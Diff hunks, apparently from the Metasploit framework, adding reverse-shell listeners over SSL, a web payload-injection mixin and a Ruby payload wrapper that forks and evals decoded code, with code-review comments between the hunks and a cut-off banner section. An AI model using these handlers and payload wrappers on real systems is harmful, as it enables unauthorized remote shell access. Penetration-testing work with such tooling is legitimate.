# include Msf::Exploit::Remote::FtpServer
|
||||
# ...
|
||||
# def on_client_command_syst(cmd_conn, arg)
|
||||
# print_status("Responding to SYST request")
|
||||
# buf = build_exploit_buffer(cmd_conn)
|
||||
# cmd_conn.put("215 Unix Type: #{buf}\r\n")
|
||||
# end
|
||||
# end
|
||||
#
|
||||
# @param (see TcpServer#on_client_data)
|
||||
# @return (see TcpServer#on_client_data)
|
||||
def on_client_data(c)
|
||||
data = c.get_once
|
||||
return if not data
|
||||
|
@ -184,6 +205,15 @@ module Exploit::Remote::FtpServer
|
|||
end
|
||||
|
||||
|
||||
# Create a socket for the protocol data, either PASV or PORT,
|
||||
# depending on the client.
|
||||
#
|
||||
# @see http://tools.ietf.org/html/rfc3659 RFC 3659
|
||||
# @see http://tools.ietf.org/html/rfc959 RFC 959
|
||||
# @param c [Socket] Control connection socket
|
||||
#
|
||||
# @return [Socket] A connected socket for the data connection
|
||||
# @return [nil] on failure
|
||||
def establish_data_connection(c)
|
||||
begin
|
||||
Timeout.timeout(20) do
|
||||
|
|
|
@ -536,20 +536,21 @@ module Exploit::Remote::HttpClient
|
|||
end
|
||||
|
||||
#
|
||||
# Make sure the URI starts with a slash and doesn't end with one
|
||||
# Returns a modified version of the URI that:
|
||||
# 1. Always has a starting slash
|
||||
# 2. Removes all the double slashes
|
||||
#
|
||||
def normalize_uri(str)
|
||||
def normalize_uri(*strs)
|
||||
new_str = strs * "/"
|
||||
|
||||
unless str.to_s[0,1] == "/"
|
||||
str = "/" + str.to_s
|
||||
new_str = new_str.gsub!("//", "/") while new_str.index("//")
|
||||
|
||||
# Makes sure there's a starting slash
|
||||
unless new_str[0,1] == '/'
|
||||
new_str = '/' + new_str
|
||||
end
|
||||
|
||||
str = str.gsub(/^\/+/, '/')
|
||||
unless str.length == 1
|
||||
str = str.gsub(/\/+$/, '')
|
||||
end
|
||||
|
||||
str
|
||||
new_str
|
||||
end
|
||||
|
||||
#
|
||||
|
|
|
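Review bot: the rewritten `normalize_uri` no longer strips trailing slashes (the old `str.gsub(/\/+$/, '')` branch is removed), so every existing caller that passed a path ending in `/` now gets a different result. The new header comment documents the leading-slash and double-slash rules but not this change, so state it explicitly and check the callers that concatenate onto the return value. Collapsing every "//" also means the method must never be given an absolute URL, since the "//" after the scheme would be collapsed too; say so in the comment. The loop `new_str = new_str.gsub!("//", "/") while new_str.index("//")` can be a single `new_str.gsub(%r{/{2,}}, '/')`, which avoids relying on `gsub!` returning nil when nothing is replaced.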
@ -28,7 +28,7 @@ module Exploit::Remote::Web
|
|||
super
|
||||
|
||||
register_options([
|
||||
OptString.new( 'PATH', [ true, 'The path to the vulnerable script.', '/' ] ),
|
||||
OptString.new( 'PATH', [ true, 'The path to the vulnerable script.', '/' ] ),
|
||||
OptString.new( 'GET', [ false, "GET parameters. ('foo=bar&vuln=#{WEB_PAYLOAD_STUB}', #{WEB_PAYLOAD_STUB} will be substituted with the payload.)", "" ] ),
|
||||
OptString.new( 'POST', [ false, "POST parameters. ('foo=bar&vuln=#{WEB_PAYLOAD_STUB}', #{WEB_PAYLOAD_STUB} will be substituted with the payload.)", "" ] ),
|
||||
OptString.new( 'COOKIES', [ false, "Cookies to be sent with the request. ('foo=bar;vuln=#{WEB_PAYLOAD_STUB}', #{WEB_PAYLOAD_STUB} will be substituted with the payload.)", "" ] ),
|
||||
|
@ -75,14 +75,21 @@ module Exploit::Remote::Web
|
|||
|
||||
def exploit
|
||||
print_status "Sending HTTP request for #{path}"
|
||||
if res = perform_request
|
||||
print_status "The server responded with HTTP status code #{res.code}."
|
||||
else
|
||||
print_status 'The server did not respond to our request.'
|
||||
end
|
||||
res = perform_request
|
||||
if res
|
||||
print_status "The server responded with HTTP status code #{res.code}."
|
||||
else
|
||||
print_status 'The server did not respond to our request.'
|
||||
end
|
||||
handler
|
||||
end
|
||||
|
||||
def tries
|
||||
1
|
||||
end
|
||||
|
||||
private
|
||||
|
||||
def perform_request
|
||||
send_request_cgi({
|
||||
'global' => true,
|
||||
|
|
|
@ -0,0 +1,300 @@
|
|||
# -*- coding: binary -*-
|
||||
module Msf
|
||||
module Handler
|
||||
|
||||
###
|
||||
#
|
||||
# This module implements the reverse double TCP handler. This means
|
||||
# that it listens on a port waiting for a two connections, one connection
|
||||
# is treated as stdin, the other as stdout.
|
||||
#
|
||||
# This handler depends on having a local host and port to
|
||||
# listen on.
|
||||
#
|
||||
###
|
||||
module ReverseTcpDoubleSSL
|
||||
|
||||
include Msf::Handler
|
||||
|
||||
#
|
||||
# Returns the string representation of the handler type, in this case
|
||||
# 'reverse_tcp_double'.
|
||||
#
|
||||
def self.handler_type
|
||||
return "reverse_tcp_double_ssl"
|
||||
end
|
||||
|
||||
#
|
||||
# Returns the connection-described general handler type, in this case
|
||||
# 'reverse'.
|
||||
#
|
||||
def self.general_handler_type
|
||||
"reverse"
|
||||
end
|
||||
|
||||
#
|
||||
# Initializes the reverse TCP handler and ads the options that are required
|
||||
# for all reverse TCP payloads, like local host and local port.
|
||||
#
|
||||
def initialize(info = {})
|
||||
super
|
||||
|
||||
register_options(
|
||||
[
|
||||
Opt::LHOST,
|
||||
Opt::LPORT(4444)
|
||||
], Msf::Handler::ReverseTcpDoubleSSL)
|
||||
|
||||
register_advanced_options(
|
||||
[
|
||||
OptBool.new('ReverseAllowProxy', [ true, 'Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST', false]),
|
||||
], Msf::Handler::ReverseTcpDoubleSSL)
|
||||
|
||||
self.conn_threads = []
|
||||
end
|
||||
|
||||
#
|
||||
# Starts the listener but does not actually attempt
|
||||
# to accept a connection. Throws socket exceptions
|
||||
# if it fails to start the listener.
|
||||
#
|
||||
def setup_handler
|
||||
if datastore['Proxies'] and not datastore['ReverseAllowProxy']
|
||||
raise RuntimeError, 'TCP connect-back payloads cannot be used with Proxies. Can be overriden by setting ReverseAllowProxy to true'
|
||||
end
|
||||
self.listener_sock = Rex::Socket::TcpServer.create(
|
||||
# 'LocalHost' => datastore['LHOST'],
|
||||
'LocalPort' => datastore['LPORT'].to_i,
|
||||
'Comm' => comm,
|
||||
'SSL' => true,
|
||||
'Context' =>
|
||||
{
|
||||
'Msf' => framework,
|
||||
'MsfPayload' => self,
|
||||
'MsfExploit' => assoc_exploit
|
||||
})
|
||||
end
|
||||
|
||||
#
|
||||
# Closes the listener socket if one was created.
|
||||
#
|
||||
def cleanup_handler
|
||||
stop_handler
|
||||
|
||||
# Kill any remaining handle_connection threads that might
|
||||
# be hanging around
|
||||
conn_threads.each { |thr|
|
||||
thr.kill
|
||||
}
|
||||
end
|
||||
|
||||
#
|
||||
# Starts monitoring for an inbound connection.
|
||||
#
|
||||
def start_handler
|
||||
self.listener_thread = framework.threads.spawn("ReverseTcpDoubleSSLHandlerListener", false) {
|
||||
sock_inp = nil
|
||||
sock_out = nil
|
||||
|
||||
print_status("Started reverse double handler")
|
||||
|
||||
begin
|
||||
# Accept two client connection
|
||||
begin
|
||||
client_a = self.listener_sock.accept
|
||||
print_status("Accepted the first client connection...")
|
||||
|
||||
client_b = self.listener_sock.accept
|
||||
print_status("Accepted the second client connection...")
|
||||
|
||||
sock_inp, sock_out = detect_input_output(client_a, client_b)
|
||||
|
||||
rescue
|
||||
wlog("Exception raised during listener accept: #{$!}\n\n#{$@.join("\n")}")
|
||||
return nil
|
||||
end
|
||||
|
||||
# Increment the has connection counter
|
||||
self.pending_connections += 1
|
||||
|
||||
# Start a new thread and pass the client connection
|
||||
# as the input and output pipe. Client's are expected
|
||||
# to implement the Stream interface.
|
||||
conn_threads << framework.threads.spawn("ReverseTcpDoubleSSLHandlerSession", false, sock_inp, sock_out) { | sock_inp_copy, sock_out_copy|
|
||||
begin
|
||||
chan = TcpReverseDoubleSSLSessionChannel.new(framework, sock_inp_copy, sock_out_copy)
|
||||
handle_connection(chan.lsock)
|
||||
rescue
|
||||
elog("Exception raised from handle_connection: #{$!}\n\n#{$@.join("\n")}")
|
||||
end
|
||||
}
|
||||
end while true
|
||||
}
|
||||
end
|
||||
|
||||
#
|
||||
# Accept two sockets and determine which one is the input and which
|
||||
# is the output. This method assumes that these sockets pipe to a
|
||||
# remote shell, it should overridden if this is not the case.
|
||||
#
|
||||
def detect_input_output(sock_a, sock_b)
|
||||
|
||||
begin
|
||||
|
||||
# Flush any pending socket data
|
||||
sock_a.get_once if sock_a.has_read_data?(0.25)
|
||||
sock_b.get_once if sock_b.has_read_data?(0.25)
|
||||
|
||||
etag = Rex::Text.rand_text_alphanumeric(16)
|
||||
echo = "echo #{etag};\n"
|
||||
|
||||
print_status("Command: #{echo.strip}")
|
||||
|
||||
print_status("Writing to socket A")
|
||||
sock_a.put(echo)
|
||||
|
||||
print_status("Writing to socket B")
|
||||
sock_b.put(echo)
|
||||
|
||||
print_status("Reading from sockets...")
|
||||
|
||||
resp_a = ''
|
||||
resp_b = ''
|
||||
|
||||
if (sock_a.has_read_data?(1))
|
||||
print_status("Reading from socket A")
|
||||
resp_a = sock_a.get_once
|
||||
print_status("A: #{resp_a.inspect}")
|
||||
end
|
||||
|
||||
if (sock_b.has_read_data?(1))
|
||||
print_status("Reading from socket B")
|
||||
resp_b = sock_b.get_once
|
||||
print_status("B: #{resp_b.inspect}")
|
||||
end
|
||||
|
||||
print_status("Matching...")
|
||||
if (resp_b.match(etag))
|
||||
print_status("A is input...")
|
||||
return sock_a, sock_b
|
||||
else
|
||||
print_status("B is input...")
|
||||
return sock_b, sock_a
|
||||
end
|
||||
|
||||
rescue ::Exception
|
||||
print_status("Caught exception in detect_input_output: #{$!}")
|
||||
end
|
||||
|
||||
end
|
||||
|
||||
#
|
||||
# Stops monitoring for an inbound connection.
|
||||
#
|
||||
def stop_handler
|
||||
# Terminate the listener thread
|
||||
if (self.listener_thread and self.listener_thread.alive? == true)
|
||||
self.listener_thread.kill
|
||||
self.listener_thread = nil
|
||||
end
|
||||
|
||||
if (self.listener_sock)
|
||||
self.listener_sock.close
|
||||
self.listener_sock = nil
|
||||
end
|
||||
end
|
||||
|
||||
protected
|
||||
|
||||
attr_accessor :listener_sock # :nodoc:
|
||||
attr_accessor :listener_thread # :nodoc:
|
||||
attr_accessor :conn_threads # :nodoc:
|
||||
|
||||
|
||||
module TcpReverseDoubleSSLChannelExt
|
||||
attr_accessor :localinfo
|
||||
attr_accessor :peerinfo
|
||||
end
|
||||
|
||||
###
|
||||
#
|
||||
# This class wrappers the communication channel built over the two inbound
|
||||
# connections, allowing input and output to be split across both.
|
||||
#
|
||||
###
|
||||
class TcpReverseDoubleSSLSessionChannel
|
||||
|
||||
include Rex::IO::StreamAbstraction
|
||||
|
||||
def initialize(framework, inp, out)
|
||||
@framework = framework
|
||||
@sock_inp = inp
|
||||
@sock_out = out
|
||||
|
||||
initialize_abstraction
|
||||
|
||||
self.lsock.extend(TcpReverseDoubleSSLChannelExt)
|
||||
self.lsock.peerinfo = @sock_inp.getpeername[1,2].map{|x| x.to_s}.join(":")
|
||||
self.lsock.localinfo = @sock_inp.getsockname[1,2].map{|x| x.to_s}.join(":")
|
||||
|
||||
monitor_shell_stdout
|
||||
end
|
||||
|
||||
#
|
||||
# Funnel data from the shell's stdout to +rsock+
|
||||
#
|
||||
# +StreamAbstraction#monitor_rsock+ will deal with getting data from
|
||||
# the client (user input). From there, it calls our write() below,
|
||||
# funneling the data to the shell's stdin on the other side.
|
||||
#
|
||||
def monitor_shell_stdout
|
||||
|
||||
# Start a thread to pipe data between stdin/stdout and the two sockets
|
||||
@monitor_thread = @framework.threads.spawn("ReverseTcpDoubleSSLHandlerMonitor", false) {
|
||||
begin
|
||||
while true
|
||||
# Handle data from the server and write to the client
|
||||
if (@sock_out.has_read_data?(0.50))
|
||||
buf = @sock_out.get_once
|
||||
break if buf.nil?
|
||||
rsock.put(buf)
|
||||
end
|
||||
end
|
||||
rescue ::Exception => e
|
||||
ilog("ReverseTcpDoubleSSL monitor thread raised #{e.class}: #{e}")
|
||||
end
|
||||
|
||||
# Clean up the sockets...
|
||||
begin
|
||||
@sock_inp.close
|
||||
@sock_out.close
|
||||
rescue ::Exception
|
||||
end
|
||||
}
|
||||
end
|
||||
|
||||
def write(buf, opts={})
|
||||
@sock_inp.write(buf, opts)
|
||||
end
|
||||
|
||||
def read(length=0, opts={})
|
||||
@sock_out.read(length, opts)
|
||||
end
|
||||
|
||||
#
|
||||
# Closes the stream abstraction and kills the monitor thread.
|
||||
#
|
||||
def close
|
||||
@monitor_thread.kill if (@monitor_thread)
|
||||
@monitor_thread = nil
|
||||
|
||||
cleanup_abstraction
|
||||
end
|
||||
|
||||
end
|
||||
|
||||
|
||||
end
|
||||
|
||||
end
|
||||
end
|
|
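Review bot: `detect_input_output` rescues `::Exception`, prints a status line and falls through, so on any error it returns whatever `print_status` returns instead of a socket pair; `start_handler` then assigns `sock_inp, sock_out` from that value and `TcpReverseDoubleSSLSessionChannel.new` fails on `@sock_inp.getpeername`. Return explicitly or re-raise, and have the accept loop close both clients and continue. In the same loop, `return nil` sits inside the block passed to `framework.threads.spawn`, where it cannot act as a return from `start_handler`; `break` or `next` states the intent. In `setup_handler` the `'LocalHost'` entry is commented out, so the listener is not restricted to LHOST, and there is no `SSLCert` option as in the `ReverseTcpSsl` handler added alongside it. The header comments still describe the non-SSL handler ('reverse_tcp_double', "reverse double TCP handler") and contain typos ("a two connections", "ads"), and the per-socket `print_status` lines in `detect_input_output` read like debugging output that belongs at `vprint_status` or in the log.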
@ -0,0 +1,124 @@
|
|||
require 'rex/socket'
|
||||
require 'thread'
|
||||
|
||||
require 'msf/core/handler/reverse_tcp'
|
||||
|
||||
module Msf
|
||||
module Handler
|
||||
|
||||
###
|
||||
#
|
||||
# This module implements the reverse TCP handler. This means
|
||||
# that it listens on a port waiting for a connection until
|
||||
# either one is established or it is told to abort.
|
||||
#
|
||||
# This handler depends on having a local host and port to
|
||||
# listen on.
|
||||
#
|
||||
###
|
||||
module ReverseTcpSsl
|
||||
|
||||
include Msf::Handler::ReverseTcp
|
||||
|
||||
#
|
||||
# Returns the string representation of the handler type, in this case
|
||||
# 'reverse_tcp_ssl'.
|
||||
#
|
||||
def self.handler_type
|
||||
return "reverse_tcp_ssl"
|
||||
end
|
||||
|
||||
#
|
||||
# Returns the connection-described general handler type, in this case
|
||||
# 'reverse'.
|
||||
#
|
||||
def self.general_handler_type
|
||||
"reverse"
|
||||
end
|
||||
|
||||
#
|
||||
# Initializes the reverse TCP SSL handler and adds the certificate option.
|
||||
#
|
||||
def initialize(info = {})
|
||||
super
|
||||
register_advanced_options(
|
||||
[
|
||||
OptPath.new('SSLCert', [ false, 'Path to a custom SSL certificate (default is randomly generated)'])
|
||||
], Msf::Handler::ReverseTcpSsl)
|
||||
|
||||
end
|
||||
|
||||
#
|
||||
# Starts the listener but does not actually attempt
|
||||
# to accept a connection. Throws socket exceptions
|
||||
# if it fails to start the listener.
|
||||
#
|
||||
def setup_handler
|
||||
if datastore['Proxies']
|
||||
raise RuntimeError, 'TCP connect-back payloads cannot be used with Proxies'
|
||||
end
|
||||
|
||||
ex = false
|
||||
# Switch to IPv6 ANY address if the LHOST is also IPv6
|
||||
addr = Rex::Socket.resolv_nbo(datastore['LHOST'])
|
||||
# First attempt to bind LHOST. If that fails, the user probably has
|
||||
# something else listening on that interface. Try again with ANY_ADDR.
|
||||
any = (addr.length == 4) ? "0.0.0.0" : "::0"
|
||||
|
||||
addrs = [ Rex::Socket.addr_ntoa(addr), any ]
|
||||
|
||||
comm = datastore['ReverseListenerComm']
|
||||
if comm.to_s == "local"
|
||||
comm = ::Rex::Socket::Comm::Local
|
||||
else
|
||||
comm = nil
|
||||
end
|
||||
|
||||
if not datastore['ReverseListenerBindAddress'].to_s.empty?
|
||||
# Only try to bind to this specific interface
|
||||
addrs = [ datastore['ReverseListenerBindAddress'] ]
|
||||
|
||||
# Pick the right "any" address if either wildcard is used
|
||||
addrs[0] = any if (addrs[0] == "0.0.0.0" or addrs == "::0")
|
||||
end
|
||||
addrs.each { |ip|
|
||||
begin
|
||||
|
||||
comm.extend(Rex::Socket::SslTcp)
|
||||
self.listener_sock = Rex::Socket::SslTcpServer.create(
|
||||
'LocalHost' => datastore['LHOST'],
|
||||
'LocalPort' => datastore['LPORT'].to_i,
|
||||
'Comm' => comm,
|
||||
'SSLCert' => datastore['SSLCert'],
|
||||
'Context' =>
|
||||
{
|
||||
'Msf' => framework,
|
||||
'MsfPayload' => self,
|
||||
'MsfExploit' => assoc_exploit
|
||||
})
|
||||
|
||||
ex = false
|
||||
|
||||
comm_used = comm || Rex::Socket::SwitchBoard.best_comm( ip )
|
||||
comm_used = Rex::Socket::Comm::Local if comm_used == nil
|
||||
|
||||
if( comm_used.respond_to?( :type ) and comm_used.respond_to?( :sid ) )
|
||||
via = "via the #{comm_used.type} on session #{comm_used.sid}"
|
||||
else
|
||||
via = ""
|
||||
end
|
||||
|
||||
print_status("Started reverse SSL handler on #{ip}:#{datastore['LPORT']} #{via}")
|
||||
break
|
||||
rescue
|
||||
ex = $!
|
||||
print_error("Handler failed to bind to #{ip}:#{datastore['LPORT']}")
|
||||
end
|
||||
}
|
||||
raise ex if (ex)
|
||||
end
|
||||
|
||||
end
|
||||
|
||||
end
|
||||
end
|
|
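Review bot: Inside `addrs.each { |ip|` the listener is created with `'LocalHost' => datastore['LHOST']` rather than `ip`, so every iteration binds the same address, the fallback to the ANY address and the `ReverseListenerBindAddress` override never take effect, and the "Started reverse SSL handler on #{ip}" message can name an address that was not bound; pass `ip` instead. The wildcard check `addrs == "::0"` compares the whole array to a string and is always false; it should be `addrs[0] == "::0"`. `comm` is nil unless ReverseListenerComm is "local", so `comm.extend(Rex::Socket::SslTcp)` is applied to nil on the default path and to the shared `Rex::Socket::Comm::Local` constant otherwise; that line needs a guard or a comment giving the reason. The module comment still reads "reverse TCP handler" and should mention SSL.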
@ -479,4 +479,20 @@ class Msf::Module::Platform
|
|||
Rank = 100
|
||||
Alias = "php"
|
||||
end
|
||||
|
||||
#
|
||||
# JavaScript
|
||||
#
|
||||
class JavaScript < Msf::Module::Platform
|
||||
Rank = 100
|
||||
Alias = "js"
|
||||
end
|
||||
|
||||
#
|
||||
# Python
|
||||
#
|
||||
class Python < Msf::Module::Platform
|
||||
Rank = 100
|
||||
Alias = "python"
|
||||
end
|
||||
end
|
||||
|
|
|
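Review bot: The new `JavaScript` and `Python` classes both use `Rank = 100`, the same value as the `php` entry in the context lines above them. If `Rank` is meant to distinguish platforms when they are ordered or looked up, each needs its own value; if duplicates are acceptable, a one-line comment saying so would save the next reader the question.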
@ -35,15 +35,14 @@ module Msf::Payload::Java
|
|||
end
|
||||
|
||||
#
|
||||
# Used by stagers to create a jar file as a Rex::Zip::Jar. Stagers define
|
||||
# a list of class files in @class_files which are pulled from
|
||||
# Msf::Config.data_directory. The configuration file is created by the
|
||||
# payload's #config method.
|
||||
#
|
||||
# +opts+ can include:
|
||||
# +:main_class+:: the name of the Main-Class attribute in the manifest.
|
||||
# Defaults to "metasploit.Payload"
|
||||
# Used by stagers to create a jar file as a {Rex::Zip::Jar}. Stagers
|
||||
# define a list of class files in @class_files which are pulled from
|
||||
# {Msf::Config.data_directory}. The configuration file is created by
|
||||
# the payload's #config method.
|
||||
#
|
||||
# @option opts :main_class [String] the name of the Main-Class
|
||||
# attribute in the manifest. Defaults to "metasploit.Payload"
|
||||
# @return [Rex::Zip::Jar]
|
||||
def generate_jar(opts={})
|
||||
raise if not respond_to? :config
|
||||
# Allow changing the jar's Main Class in the manifest so wrappers
|
||||
|
@ -63,12 +62,12 @@ module Msf::Payload::Java
|
|||
end
|
||||
|
||||
#
|
||||
# Like #generate_jar, this method is used by stagers to create a war file
|
||||
# Like {#generate_jar}, this method is used by stagers to create a war file
|
||||
# as a Rex::Zip::Jar object.
|
||||
#
|
||||
# +opts+ can include:
|
||||
# +:app_name+:: the name of the \<servlet-name> attribute in the web.xml.
|
||||
# Defaults to "NAME"
|
||||
# @param opts [Hash]
|
||||
# @option :app_name [String] Name of the \<servlet-name> attribute in the
|
||||
# web.xml. Defaults to random
|
||||
#
|
||||
def generate_war(opts={})
|
||||
raise if not respond_to? :config
|
||||
|
|
|
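Review bot: The `@option :app_name [String]` tag omits the hash name; the YARD form is `@option opts :app_name [String]`, as the `generate_jar` comment in the previous hunk already uses. The documented default changes from "NAME" to "random" in the comment only, so confirm the method body matches. For consistency with `generate_jar`, add `@return [Rex::Zip::Jar]` and brace `Rex::Zip::Jar` in the summary line.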
@ -0,0 +1,39 @@
|
|||
# -*- coding: binary -*-
|
||||
require 'msf/core'
|
||||
|
||||
module Msf::Payload::Ruby
|
||||
|
||||
def initialize(info = {})
|
||||
super(info)
|
||||
|
||||
register_advanced_options(
|
||||
[
|
||||
# Since space restrictions aren't really a problem, default this to
|
||||
# true.
|
||||
Msf::OptBool.new('PrependFork', [ false, "Start the payload in its own process via fork or popen", "true" ])
|
||||
]
|
||||
)
|
||||
end
|
||||
|
||||
def prepends(buf)
|
||||
if datastore['PrependFork']
|
||||
buf = %Q^
|
||||
code = %(#{ Rex::Text.encode_base64(buf) }).unpack(%(m0)).first
|
||||
if RUBY_PLATFORM =~ /mswin|mingw|win32/
|
||||
inp = IO.popen(%(ruby), %(wb)) rescue nil
|
||||
if inp
|
||||
inp.write(code)
|
||||
inp.close
|
||||
end
|
||||
else
|
||||
if ! Process.fork()
|
||||
eval(code) rescue nil
|
||||
end
|
||||
end
|
||||
^.strip.split(/\n/).map{|line| line.strip}.join("\n")
|
||||
end
|
||||
|
||||
buf
|
||||
end
|
||||
|
||||
end
|
|
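Review bot: `PrependFork` is declared with the string `"true"` as its default in `Msf::OptBool.new('PrependFork', [ false, ..., "true" ])`; a boolean `true` keeps the default the same type as a user-set value and avoids depending on how `datastore['PrependFork']` is normalised before the `if` in `prepends`. The `register_advanced_options` call also omits the owner argument that the handler files in this patch pass, and neither the module nor `prepends` has a doc comment saying what is returned when the option is off.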
@ -274,7 +274,7 @@ module Msf::Post::File
|
|||
end
|
||||
|
||||
#
|
||||
# Read a local file +local+ and write it as +remote+ on the remote file
|
||||
# Read a local file +local+ and write it as +remote+ on the remote file
|
||||
# system
|
||||
#
|
||||
def upload_file(remote, local)
|
||||
|
@ -304,7 +304,7 @@ module Msf::Post::File
|
|||
#
|
||||
def rename_file(new_file, old_file)
|
||||
#TODO: this is not ideal as the file contents are sent to meterp server and back to the client
|
||||
write_file(new_file, read_file(old_file))
|
||||
write_file(new_file, read_file(old_file))
|
||||
rm_f(old_file)
|
||||
end
|
||||
alias :move_file :rename_file
|
||||
|
@ -315,7 +315,7 @@ protected
|
|||
# Meterpreter-specific file read. Returns contents of remote file
|
||||
# +file_name+ as a String or nil if there was an error
|
||||
#
|
||||
# You should never call this method directly. Instead, call #read_file
|
||||
# You should never call this method directly. Instead, call {#read_file}
|
||||
# which will call this if it is appropriate for the given session.
|
||||
#
|
||||
def _read_file_meterpreter(file_name)
|
||||
|
|
|
@ -10,301 +10,52 @@ module Ui
|
|||
module Banner
|
||||
|
||||
Logos =
|
||||
[
|
||||
%Q{
|
||||
%whiCall trans opt: received. 2-19-98 13:24:18 REC:Loc
|
||||
|
||||
Trace program: running
|
||||
|
||||
wake up, Neo...
|
||||
%bldthe matrix has you%clr
|
||||
follow the white rabbit.
|
||||
|
||||
knock, knock, Neo.
|
||||
|
||||
(`. ,-,
|
||||
` `. ,;' /
|
||||
`. ,'/ .'
|
||||
`. X /.'
|
||||
.-;--''--.._` ` (
|
||||
.' / `
|
||||
, ` ' Q '
|
||||
, , `._ \\
|
||||
,.| ' `-.;_'
|
||||
: . ` ; ` ` --,.._;
|
||||
' ` , ) .'
|
||||
`._ , ' /_
|
||||
; ,''-,;' ``-
|
||||
``-..__``--`
|
||||
%clr},
|
||||
|
||||
%Q{%whi
|
||||
_---------.
|
||||
.' ####### ;."
|
||||
.---,. ;@ @@`; .---,..
|
||||
." @@@@@'.,'@@ @@@@@',.'@@@@ ".
|
||||
'-.@@@@@@@@@@@@@ @@@@@@@@@@@@@ @;
|
||||
`.@@@@@@@@@@@@ @@@@@@@@@@@@@@ .'
|
||||
"--'.@@@ -.@ @ ,'- .'--"
|
||||
".@' ; @ @ `. ;'
|
||||
|@@@@ @@@ @ .
|
||||
' @@@ @@ @@ ,
|
||||
`.@@@@ @@ .
|
||||
',@@ @ ; _____________
|
||||
( 3 C ) /|___ / Metasploit! \\
|
||||
;@'. __*__,." \\|--- \\_____________/
|
||||
'(.,...."/
|
||||
%clr},
|
||||
'
|
||||
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
|
||||
%% %%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
|
||||
%% %% %%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
|
||||
%% % %%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
|
||||
%% %% %%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
|
||||
%% %%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
|
||||
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
|
||||
%%%%% %%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
|
||||
%%%% %% %%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%% %%%%%
|
||||
%%%% %% %% % %% %% %%%%% % %%%% %% %%%%%% %%
|
||||
%%%% %% %% % %%% %%%% %%%% %% %%%% %%%% %% %% %% %%% %% %%% %%%%%
|
||||
%%%% %%%%%% %% %%%%%% %%%% %%% %%%% %% %% %%% %%% %% %% %%%%%
|
||||
%%%%%%%%%%%% %%%% %%%%% %% %% % %% %%%% %%%% %%% %%% %
|
||||
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%% %%%%%%%%%%%%%%
|
||||
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%
|
||||
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
|
||||
',
|
||||
'
|
||||
_ _
|
||||
/ \ /\ __ _ __ /_/ __
|
||||
| |\ / | _____ \ \ ___ _____ | | / \ _ \ \
|
||||
| | \/| | | ___\ |- -| /\ / __\ | -__/ | || | || | |- -|
|
||||
|_| | | | _|__ | |_ / -\ __\ \ | | | | \__/| | | |_
|
||||
|/ |____/ \___\/ /\ \\\\___/ \/ \__| |_\ \___\
|
||||
',
|
||||
%Q{
|
||||
%whiIIIIII %reddTb.dTb%clr _.---._
|
||||
%whi II %red4' v 'B%clr .'"".'/|\`.""'.
|
||||
%whi II %red6. .P%clr : .' / | \ `. :
|
||||
%whi II %red'T;. .;P'%clr '.' / | \ `.'
|
||||
%whi II %red'T; ;P'%clr `. / | \ .'
|
||||
%whiIIIIII %red'YvP'%clr `-.__|__.-'
|
||||
|
||||
I love shells --egypt
|
||||
},
|
||||
'
|
||||
, ,
|
||||
/ \
|
||||
((__---,,,---__))
|
||||
(_) O O (_)_________
|
||||
\ _ / |\
|
||||
o_o \ M S F | \
|
||||
\ _____ | *
|
||||
||| WW|||
|
||||
||| |||
|
||||
',
|
||||
'
|
||||
# cowsay++
|
||||
____________
|
||||
< metasploit >
|
||||
------------
|
||||
\ ,__,
|
||||
\ (oo)____
|
||||
(__) )\
|
||||
||--|| *
|
||||
',
|
||||
|
||||
|
||||
'%clr
|
||||
______________________________________________________________________________
|
||||
| |
|
||||
| %bld3Kom SuperHack II Logon%clr |
|
||||
|______________________________________________________________________________|
|
||||
| |
|
||||
| |
|
||||
| |
|
||||
| User Name: [ %redsecurity%clr ] |
|
||||
| |
|
||||
| Password: [ ] |
|
||||
| |
|
||||
| |
|
||||
| |
|
||||
| %bld[ OK ]%clr |
|
||||
|______________________________________________________________________________|
|
||||
| |
|
||||
|______________________________________________________________________________|
|
||||
%clr
|
||||
',
|
||||
|
||||
|
||||
'%clr
|
||||
______________________________________________________________________________
|
||||
| |
|
||||
| %bld%grnMETASPLOIT CYBER MISSILE COMMAND V4%clr |
|
||||
|______________________________________________________________________________|
|
||||
%yel\%clr %yel/%clr %yel/%clr
|
||||
%yel\%clr . %yel/%clr %yel/%clr x
|
||||
%yel\%clr %yel/%clr %yel/%clr
|
||||
%yel\%clr %yel/%clr + %yel/%clr
|
||||
%yel\%clr + %yel/%clr %yel/%clr
|
||||
* %yel/%clr %yel/%clr
|
||||
%yel/%clr . %yel/%clr
|
||||
X %yel/%clr %yel/%clr X
|
||||
%yel/%clr %red###%clr
|
||||
%yel/%clr %red# %bld%%clr%red #%clr
|
||||
%yel/%clr %red###%clr
|
||||
. %yel/%clr
|
||||
. %yel/%clr . %red*%clr .
|
||||
%yel/%clr
|
||||
*
|
||||
+ %red*%clr
|
||||
|
||||
%bld^%clr
|
||||
#### __ __ __ ####### __ __ __ ####
|
||||
